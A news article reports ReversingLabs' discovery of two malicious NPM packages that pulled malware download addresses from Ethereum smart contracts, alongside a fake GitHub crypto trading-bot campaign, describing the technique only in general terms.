Hackers have begun hiding malicious software in smart contracts #Ethereum , using blockchain as cover for cyberattacks. Researchers at ReversingLabs discovered two packages in the Node Package Manager (NPM) repository that employed a new method for delivering malicious commands and links.
Blockchain as a cover for malicious code
The packages 'colortoolsv2' and 'mimelib2', published in July of this year, used Ethereum smart contracts to conceal malicious commands that installed loaders on compromised systems. Researcher Lucija Valentić from ReversingLabs explained that the attackers employed 'an innovative and creative technique for delivering malware to compromised devices — Ethereum blockchain smart contracts.'
To avoid security scanning, the packages functioned as simple loaders. Instead of directly hosting malicious links, they extracted command server addresses from smart contracts. Upon installation, the packages queried the blockchain for second-stage malware download URLs, complicating detection as blockchain traffic appears legitimate.
New Attack Vector
Malware targeting Ethereum smart contracts is not new — it was used earlier this year by the Lazarus Group, a hacking group linked to North Korea. However, using Ethereum smart contracts to host URLs with malicious commands represents a fundamentally new approach.
“This is something we haven’t seen before, and it highlights the rapid evolution of evasion strategies by malicious actors targeting open-source repositories and developers,” said Valentić.
Complex deception campaign
Malicious packages became part of a large-scale social engineering and deception campaign primarily conducted through GitHub. The attackers created fake repositories of trading bots for cryptocurrencies that appeared extremely reliable due to:
Faking commits to simulate active development
Creating fake user accounts specifically to track repositories
Multiple accompanying accounts to simulate teamwork
Professionally looking project descriptions and documentation
Evolution of Threats
In 2024, security researchers documented 23 cryptocurrency-related malicious campaigns in open-source repositories. This latest attack vector demonstrates the evolution of attacks on repositories, combining blockchain technology with sophisticated social engineering to bypass traditional detection methods.
Such attacks are not only conducted on Ethereum. In April, a fake GitHub repository posing as a Solana trading bot was used to distribute hidden malware that steals cryptocurrency wallet data.
The use of blockchain as a tool for concealing malicious code represents a significant step in the evolution of cyber threats. This method shows how attackers adapt to modern technologies, turning decentralized systems to their advantage.
